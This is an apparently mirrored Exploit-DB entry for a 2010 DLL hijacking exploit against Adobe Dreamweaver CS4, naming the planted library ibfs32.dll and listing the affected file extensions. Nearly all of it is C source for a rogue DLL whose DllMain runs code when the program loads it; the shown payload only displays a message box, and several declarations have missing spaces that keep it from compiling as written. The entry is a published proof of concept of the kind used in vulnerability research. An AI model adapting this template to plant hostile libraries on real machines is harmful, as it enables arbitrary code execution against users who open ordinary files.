Adobe Dreamweaver CS4 – ‘ibfs32.dll’ DLL Hijacking

  • 作者: Glafkos Charalambous
    日期: 2010-08-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14735/
  • /* 
    Exploit Title: Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)
    Date: August 25, 2010
    Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
    Version: 10.0 Build 4117
    Tested on: Windows 7 Ultimate x86
    Vulnerable extensions: .asp .asa. aspx .php .php5 .cfm .tpl .asr .jsp (etc)
    Greetz: Astalavista, OffSEC, Exploit-DB
    */
    
    #include <windows.h>
    #define DllExport __declspec (dllexport)
    
    BOOL WINAPIDllMain (
    HANDLEhinstDLL,
    DWORD fdwReason,
    LPVOIDlpvReserved)
    {
    dll_hijack();
    return 0;
    }
    
    int dll_hijack()
    {
    MessageBox(0, "Dreamweaver DLL Hijacking!", "DLL Message", MB_OK);
    return 0;
    }